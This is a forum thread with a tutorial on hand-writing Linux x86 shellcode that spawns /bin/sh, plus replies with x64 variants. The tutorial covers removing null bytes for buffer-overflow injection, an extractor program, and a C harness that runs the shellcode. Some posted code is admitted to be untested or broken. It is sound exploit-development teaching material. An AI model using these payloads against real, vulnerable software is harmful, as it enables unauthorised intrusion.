Linux Shellcoding (Part 1.0)

IoTh1nkN0t · May 10, 2016, 3:31pm

As promised, here is the shellcode tutorial once again

Requirements

Alright so this isn’t going to be msfvenom tutorial. (shellcodes are payloads).
This tutorial will focus on writing shellcodes using Assembly.

Knowledge of C and Assembly is highly recommend. Also knowing how the stack works is a big plus.

Memory Segments

When a program is run it is loaded in the RAM. Normally 5 segments are used in programs:

The stack segment (For function calls (dynamic)).
The heap segment (For dynamicly allocating memory).
The data segment (Variables).
The bss segment (Variables).
The text segment (Set of instructions (The actual code)).

With assembly you have total control over these segments.
In shellcoding however we will only be using the text and the stack segment.

Assembly primer

So first we need to know some assembly.

The registers
We will be focusing on a couple of registers:

The EAX register
The EBX register
The ECX register
The EDX register
The ESP register

These registers are like little pieces of memory that are in the CPU.
They have nothing to do with RAM though as they are part of the CPU.
The CPU uses these registers to do calculations and perform simple algorithms.

In assembly we adress these registers, they can be thought of as variables.

Assembly instructions
There are some instructions that are important in assembly programming:

MOV (assign, for example MOV EAX, 32 (EAX = 32)).
XOR (Exclusive OR, for example XOR EAX, EAX)
PUSH (Push something on the stack, example: PUSH EAX).
POP (Load what was on the stack in a register/variable, example: POP EBX).
CALL (Call a function, for example: CALL FuncPrint).
INT (Interrupt, kernel command, for example INT 0x80 which is used in calling syscalls).

Be sure that you understand these concepts.
You can ofcourse try to learn what they mean from this tutorial,
but it’s better to take your time to learn about these from a more in depth source.

Syscalls

What is important in shellcoding, is making use of syscalls.
Syscalls are functions that the kernel recognizes, this means that if your shellcode calls a syscall,
you don’t have to include headers or declare them.

here: http://syscalls.kernelgrok.com/ you can find an overview of all linux x86 syscalls, look up syscall 11 (0xB).

A syscall takes arguments like normal functions, however syscalls are different in that they don’t use the stack.
You can think of syscall parameters like argv[] in C:

argv[0] the ‘first’ argument (your program in C), would be the EAX register.
This is also where you load the syscall number, for execve this is 11, or 0xB in hexa.

argv[1] is like the second argument and would be the EBX register. For example the string “/bin/bash”,

note that a string in C is called as a pointer, for example char *s = “Hello World”.
The variable ‘s’ is a pointer and NOT the actual string, it’s a memory adress where the string is stored.
s could be something like 0x4000b401. On 0x4000b401 you’d then find the value ‘/’ or 0x2f in hexa.
This get’s read until the nullbyte 0x00. The actual string would never fit in the 32 bit registry.

The third argument is ECX, for execve this would be the arguments for the program that gets called (also a string).

A too simple shellcode

A shellcode is in many ways similar to a normal program, except for the fact that it uses the virtual space used by the program you are exploitating (so not his own).

The name shellcode is kind of misleading, it implies shellcodes are used to spawn shells, however nowadays there are many other uses for shellcodes,
like chmod 777 a certain program, or download and execute a file, nevertheless ‘shellcode’ was the name that stick.

Today we will be writing a simple shellcode that spawns a shell.

First though, we will write a normal assembly program. You will need nasm installed on your machine to compile it.
sudo apt-get install nasm.

So here is the assembly program:

section .data
  msg db '/bin/sh' ; db stands for define byte, msg will now be a string pointer.
 
section .text
  global _start   ; Needed for compiler, comparable to int main()
 
_start:
  mov eax, 11     ; eax = 11, think of it like this mov [destination], [source], 11 is execve
  mov ebx, msg    ; Load the string pointer into ebx
  mov ecx, 0      ; no arguments in exc
  int 0x80        ; syscall
 
  mov eax, 1      ; exit syscall
  mov ebx, 0      ; no errors
  int 0x80        ; syscall

Copy and paste it in an editor and save as shell.asm
To compile it use the following commands:
nasm -f elf -o shell.o shell.asm
ld -o shell shell.o
Now run it with:
./shell

Awesome, a shell. This is what we wanted!, easy right?
Now lets try to extract the shellcode.
To do so use the command:
objdump -M intel -d shell
This will result in:

Lets look at the 2nd line in _start, instead of msg, it says 0x80490a0. This the memory adress of the string msg.

This is a problem though. Remember that I said a shellcode doesnt use it’s own virtual space, but that of the program?
This means, that the adress 0x80490a0 probably contains either garbage or nothing.
Since the .data segment of our assembly program isn’t used in the shellcode.
The shellcode would be:
"\xb8\x0b\x00\x00\x00\x00\xbb\xa0\x90\x04\x08\xb9\x00\x00\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80"
Now we face another problem, nullbytes.

Eliminating nullbytes

Before we continue, let’s do an experiment with a C program.
Open up an editor and write the simple program:

#include <stdio.h>
int main()
{
    printf("Hello\x00 World!");

    return 0;
}

Compile and run.

Result:
Hello

So what happened here? If you’ve programmed with C you may know the problem here, strings use \x00 for terminating.
In a bufferoverflow, the shellcode (which is a string) gets loaded on the stack.
Therefore a nullbyte will terminate the chain of instructions.

So now let’s look at our program once again.

XOR

Like I said earlier XOR is an assembly instruction.
XOR is like OR, however there is one major difference.
Let’s look at two tables.

OR:
1 OR 1 = 1
1 OR 0 = 1
0 OR 1 = 1
0 OR 0 = 0

and

XOR:
1 XOR 1 = 0
1 XOR 0 = 1
0 XOR 1 = 1
0 XOR 0 = 0

So how is this relevant? Well remember that you can’t use nullbytes.
So if you want to put 0 in a register, doing MOV EAX, 0, would cause a nullbyte.

Lets say the EAX register looks like this:
<many zero’s and one’s>…0010001101
XOR’ing EAX with itself would cause each bit to XOR itself.
the bit is either 1 or 0.

1 XOR 1 = 0.
0 XOR 0 = 0.

Therefore every bit gets set to 0.
Doing so would be the same as mov eax, 0, but without the use of nullbytes.

Now let’s look at the code objdump once again.

Notice that the operation MOV EAX, 0xb, still gives nullbytes as a result.
The reason for this is the fact that EAX is a 32 bit register.

You can read the line b8 0b 00 00 00 as:
b8 (EAX) 0b (11) 00 00 00 which translates to: EAX = 00 00 00 0b, which translates to EAX = 11, or MOV EAX, 0xb.

Adressing Lower Halves of Registries

If you’re already familiar with assembly you might’ve read that EAX’s lower half can also be used for instructions.
This lower half is called AX and is 2 bytes (16 bits) in size.

AX can also be split. the higher half is called AH and the lower half is called AL.
Think of it like this:

[---16bits---|--AH-8bits-|--AL-8bits-]
[---16bits---|-------16bits-AX-------]
[-----------32bits---EAX-------------]

So in order to assign 11 to EAX, we have to combine the things we discussed.
First we need to make sure EAX doesn’t contain garbage values.
To do so we zero EAX out with the XOR operator.
XOR EAX, EAX
Now we can assign 11 to the lower half of EAX.
MOV AL, 0xb (11)

Using the Stack to Store Variables

So we already have the first argument for our syscall ready.

Now we need to assign a string pointer to EBX, but before we do that, we need something to point to, that is, the actual character array:

|'/'|'b'|'i'|'n'|'/'|'s'|'h'|\x00|

The only dynamic memory we can use for this is the stack.
Note that each ascii character has a corresponding hex value, a table can be found http://www.asciitable.com/ here.
from left to right the hexcodes are:
0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x00.
What we can do is push these on the stack. Then we can use the stack pointer ESP as a string pointer.
Because the stack is FILO and grows downwards, we have to assign the values in reverse order.
To push values on the stack you can use the command PUSH:
PUSH , be aware that you can only push 4 bytes, each time.
Now a problem arises. You cant push “/sh\x00” on the stack. as it will terminate the shellcode.
To do so, we have to go back a few steps and look at our first two lines:

XOR EAX, EAX
MOV AL, 0xb

Notice that after XOR EAX, EAX, EAX will have the value 0.

In shellcoding it is sometimes wiser to use this to our advantage as long as possible, because we now have a 0 we can assign, with this in mind we will postpone the COMMAND MOV AL, 0xb.

So instead of pushing 0x0068732f ("\x00hs/") on the stack. we split it in two parts: 0x00 and 0x68732f.
Now instead of doing PUSH 0x00, we do PUSH EAX.
It has the same result, but we avoided a nullbyte.
Next we can do:

PUSH 0x68732f2f (Added a / here to avoid a nullbyte).
PUSH 0x6e69622f

Now the the stack pointer will point to the string “/bin//sh”.
So this will be our 2nd argument (EBX).

MOV EBX, ESP

The third argument (ECX) for our syscall execve is a string with arguments for /bin/sh. Ofcourse we don’t want this to contain garbage, because that would result in sh not running and giving a warning about invalid arguments. Therefore we need ECX to be 0.

Once again we can use our EAX register.

MOV ECX, EAX

Finally we assign EAX:

MOV AL, 0xb

And do the syscall;

INT 0x80

This leaves us with the following code:

section .text
  global _start

_start:
  xor eax, eax
  push eax
  push 0x68732f2f
  push 0x6e69622f
  mov ebx, esp
  mov ecx, eax
  mov al, 0xb
  int 0x80

Extracting the Shellcode

Now let’s compile it
nasm -f elf -o shell.o shell.asm
ld -o shell shell.o

Now to get the shellcode I wrote this C program:

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
        char l = 1;
        unsigned char buf;
        int fd;
        fd = open(argv[1],0,S_IRUSR);
        while(read(fd,&buf,1)) {
                if(buf == 0 && l == 1) {
                        printf(" \n");
                        l = 0;
                }
                else if(buf) {
                        printf("\\x%02x",buf);
                        l = 1;
                }
        }

        close(fd);
}

It will ignore caves of nullbytes and only show continues hexdumps.
One of these lines is your shellcode.

To check if your shellcode works you can use this simple C program:

int main()
{
  char *shellcode = "<the shellcode>";

  (*(void(*)()) shellcode)();
}

That was all for today, hope you enjoyed it!

unh0lys0da

WireWise · May 10, 2016, 7:06pm

Great post unh0lys0da, really enjoyed reading it. Learning this myself, and this post really cleared up some things, Thank you.

pry0cc · May 10, 2016, 7:57pm

Badass tutorial mate Love the insight.

IoTh1nkN0t · May 10, 2016, 11:56pm

Thanks, good to hear that.
If you have any questions, post them here.

oaktree · May 11, 2016, 12:00am

As great as this post is, shellcoding will make my head hurt for at least a little while longer.

AgentSniff · May 11, 2016, 1:09am

Wow! Very nice!

For those using Linux x64 based systems can check the system call list here.

to compile use nasm -f flag = elf64 (nasm --help for more info)

The manual page of syscall (man syscall) also show a table with the registers used to pass the system call args

So the print code in x64 is like:

section .data

        msg db 'Hello 0x00SEC',0x0a

section .text

        global _start

_start:

        mov rax,1       ; [1] - sys_write
        mov rdx,1       ; 0 = stdin / 1 = stdout / 2 = stderr
        mov rsi,msg     ; pointer(mem address) to msg (*char[])
        mov rdx,14      ; msg size
        syscall         ; calls the function stored in rax

        mov rax,60      ; [60] - sys_exit
        mov rdx,0       ; exit with code rdx(0)
        syscall

To start or “execute” a shell like the first example, use [59]sys_execve instead of [1]sys_write.
don’t forget to change the register values to fit sys-execve syntax

Cromical · May 11, 2016, 1:59am

Thanks! Same as @WireWise this really helped clear up a load of things as well! Thanks.

dtm · May 11, 2016, 3:05am

There is no S in hexadecimal.

AgentSniff · May 11, 2016, 3:43am

it is a string, not an hexadecimal value

dtm · May 11, 2016, 5:13am

Right, my mistake.

Also just wanted to point out some slight errors:

XOR:
// these should be XORs, not ORs
1 OR 1 = 0    // <- 1 OR 1 is 1
1 OR 0 = 1
0 OR 1 = 1
0 OR 0 = 0

and in the following line

A shellcode is in many ways similar to a normal program, except for the 
fact that it uses the RAM used by the program you are exploitating (so 
not his own).

RAM is used by all programs; it is the entirety of all memory. I think what you meant to say was that the shellcode shares the same memory space as the target program.

0x00pf · May 11, 2016, 5:28am

There are some unusual circumstances where that does not hold XIP eXecute In Place. But, this is not that common

IoTh1nkN0t · May 11, 2016, 7:03am

Hey thanks for your comment.
Thanks for mentioning that link.
It’s a common misstep for people.

Few things:
Execve and write are different syscalls and require different arguments.
Assigning rdx twice seems like a typo.
(Shouldnt the first RDX be RDI?).

In 64 bit instead of using
EAX, EBX, ECX, EDX, ESI EDI
With EAX being the syscall and EBX … EDI it’s arguments.

You use:
RAX. RDI, RSI, RDX, RCX, R8, R9
With RAX once again for the syscall, in the USERSPACE.

And:
RAX, RDI, RSI, RDX, R10, R8, R9
With RAX once again for the syscall, in the KERNELSPACE

Anyway, perhaps you could write a x64 ASM tutorial? Would be awesome, there aren’t many good ones online.

@dtm
Changed the XOR and the RAM stuff.

@0x00pf

Woah, this is some insane stuff. Though I can imagine it could be hard to find the location?

unh0lys0da

0x00pf · May 11, 2016, 6:35pm

Not sure what do you mean my find the location. Anyhow I never had a chance to use it. It is for really constrained embedded system…

IoTh1nkN0t · May 11, 2016, 9:56pm

Find the location of the inode(?) to start reading from

AgentSniff · May 11, 2016, 10:57pm

You are right about the typo with rdi and rdx.

My experience with Assembly is only with 8bits processors like atmega and PIC.

I just translate your code for x64, i hope to learn more with your next tutorials!

I was trying to open a shell calling from the stack like your example but it does not work

take a look:

section .text

        global _start:

_start:

        push 'sh'
        push 'bin/'
        mov rax,59
        mov rdi,rsp
        mov rsi,0
        ;mov rdx,0
        syscall

        mov rax,60
        mov rdi,0
        syscall

in this order of push command, it will first push two null bytes then ‘h’ and ‘s’, followed by second push ‘/’ ‘n’ ‘i’ ‘b’ right?

the stack works like a FILO (first in last out) so it spits ‘b’ ‘i’ ‘n’ ‘/’ ‘s’ ‘h’ x0 x0 right?

shell_stack: file format elf64-x86-64

Disassembly of section .text:

0000000000400080 <_start>:
  400080:    68 73 68 00 00            pushq  $0x6873
  400085:    68 62 69 6e 2f            pushq  $0x2f6e6962
  40008a:    b8 3b 00 00 00            mov    $0x3b,%eax
  40008f:    48 89 e7                  mov    %rsp,%rdi
  400092:    be 00 00 00 00            mov    $0x0,%esi
  400097:    0f 05                     syscall 
  400099:    b8 3c 00 00 00            mov    $0x3c,%eax
  40009e:    bf 00 00 00 00            mov    $0x0,%edi
  4000a3:    0f 05                     syscall

0x00pf · May 12, 2016, 4:38am

OK! I think that depends on the specific system. Usually, and specially for the first stage boot code, you usually have just one option (the address the processor starts running code), for even more embedded system you probably will need an specialised Link Script

IoTh1nkN0t · May 12, 2016, 6:32am

It won’t work for several reasons:

There are nullbytes. (If you’d use this to overflow nullterminated string input).
It’s /bin/sh
/bin/sh also has to be null terminated (You need to push a null on the stack as well).

Apart from that the code is right.

I think the following should work:

section .text
    global _start

_start:
    xor rax, rax
    push rax
    push '//sh'
    push '/bin'
    mov rdi, rsp
    mov rsi, rax
    mov rdx, rax
    xor rax, 59
    syscall

I haven’t tested it, but I think it’s somewhat like this.
You could also try to load /bin//sh in a registry since we’re working with 64 bit ^^(64 bit, 8 bytes, 8 chars).
It would be something like:

xor rax,rax
push rax
mov rsi, rax
mov rdx, rax
mov rbx, '/bin//sh'
push rbx
mov rdi, rsp
xor rax, 59
syscall

But I also haven’t tried this one.
I’ll try them later.

AgentSniff · May 12, 2016, 4:10pm

Thank you for your reply

I’m quite new to Linux, and always forget to put the root ‘/’ when using absolute path

i tried your code, it does not work here, i saw in the disassembly that the result from xor rax,rax does not result on null.

could you check this?

0x00pf · May 12, 2016, 4:50pm

@unh0lys0da: Your second code works OK on my system. The first one crashes… I haven’t checked why . I like the xor rax,59

This is my version (@unh0lys0da a small variation of the one you’ve already seen).

section .text
	msg db '/bin/sh',0 
	
	global _start   
 
_start:
	xor rax,rax
	mov rdx,rax 		; No Env
	mov rsi,rax		; No argv
	lea rdi, [rel msg]

	add al, 0x3b

	syscall

IoTh1nkN0t · May 12, 2016, 6:08pm

xor whatever, whatever
Should ALWAYS result in 0.
for each bit it is either 1 or 0
1 XOR 1 = 0
0 XOR 0 = 0

There is no way that RAX != RAX
Every bit in RAX == The same bit in RAX